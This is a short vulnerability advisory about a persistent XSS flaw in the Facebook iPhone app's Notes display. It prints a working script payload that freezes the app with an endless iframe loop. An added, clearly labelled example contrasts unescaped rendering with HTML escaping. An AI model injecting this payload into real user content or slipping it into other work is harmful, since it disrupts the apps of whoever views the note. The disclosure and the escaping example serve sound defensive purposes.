==================================
Facebook for iPhone persistent XSS
==================================
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
The Facebook application for iPhone does not encode special characters in Notes detail.
Adding this code to a note will freeze the application:
<script>var x = 'x'; while (1) { document.write('<iframe src="tel:'+x+'"></iframe>'); x = x + 'x'; }</script>
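Added example (not part of the original advisory, and not Facebook's code): a hypothetical note renderer showing the unencoded output pattern described above next to a version that encodes special characters at output time. The function names and the reduced sample note are assumptions constructed for illustration.

```javascript
// Added example: hypothetical note renderer, not the application's real code.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode the five characters that can change the HTML parsing context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the stored note is concatenated into markup as-is,
// so any tags inside it are parsed and executed by the web view.
function renderNoteUnsafe(note) {
  return '<div class="note"><h1>' + note.title + '</h1><p>' +
    note.body + '</p></div>';
}

// Hardened pattern: every user-controlled field is encoded at output time,
// so the note is displayed as text instead of being interpreted.
function renderNoteSafe(note) {
  return '<div class="note"><h1>' + escapeHtml(note.title) + '</h1><p>' +
    escapeHtml(note.body) + '</p></div>';
}

// Report whether rendered markup still contains live script or iframe tags.
function containsActiveMarkup(html) {
  return /<\s*(script|iframe)\b/i.test(html);
}

// Constructed sample note: a reduced, single-shot form of the note content
// in the advisory (no loop), used only to compare the two renderers.
const sampleNote = {
  title: 'Test note',
  body: '<script>document.write(\'<iframe src="tel:x"></iframe>\');</script>',
};

console.log('unsafe render has active markup:',
  containsActiveMarkup(renderNoteUnsafe(sampleNote)));
console.log('safe render has active markup:  ',
  containsActiveMarkup(renderNoteSafe(sampleNote)));
console.log(renderNoteSafe(sampleNote));
```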
App page:
http://www.facebook.com/apps/application.php?id=6628568379
Download:
http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=284882215&mt=8
# ~ - [ [ : Inj3ct0r : ] ]